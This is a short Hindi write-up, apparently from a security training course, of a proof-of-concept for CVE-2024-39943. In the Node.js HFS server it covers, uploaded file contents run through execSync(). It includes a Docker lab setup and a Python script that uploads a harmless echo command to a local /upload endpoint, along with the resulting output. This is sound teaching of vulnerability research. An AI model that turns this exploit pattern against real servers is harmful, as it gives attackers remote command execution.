
सीवीई-2024-39943 के लिए साक्ष्य-अवधारणा शोषण, Node.js HFS सर्वर में child_process.execSync() का उपयोग करके फ़ाइल अपलोड के माध्यम से दूरस्थ कोड निष्पादन का प्रदर्शन करता है।
व्हाइटहैट स्कूल तीसरी बैच – नो जंग-मिन (@JenmrR)
Node.js-आधारित HFS सर्वर वातावरण में, अपलोड की गई फ़ाइल की सामग्री को child_process.execSync() पर निष्पादित करने वाली एक भेद्यता मौजूद है।
हमलावर फ़ाइल अपलोड सुविधा के माध्यम से OS कमांड को सीधे निष्पादित कर सकता है, और सर्वर के आंतरिक कमांड परिणाम देख सकता है या सिस्टम को नियंत्रित कर सकता है।
यह CVE-2024-39943 के अनुरूप एक भेद्यता है, जो कमांड इंजेक्शन (रिमोट कोड निष्पादन) के समान खतरा पैदा करती है।
/upload पथ पर फ़ाइल अपलोड प्राप्त करता है और अपलोड की गई फ़ाइल की सामग्री को कमांड के रूप में निष्पादित करता है$ sudo docker-compose up --build -d
$ python3 poc.py
import requests
payload = 'echo Hello_From_Hacked_Server'
files = { 'file': ('exploit.txt', payload) }
r = requests.post('http://localhost:8080/upload', files=files)
print(r.text)
PoC निष्पादन के बाद सर्वर प्रतिक्रिया:
Executed:
Hello_From_Hacked_Server

execSync() के माध्यम से निष्पादित करने का तरीका गंभीर सुरक्षा जोखिम पैदा करता है।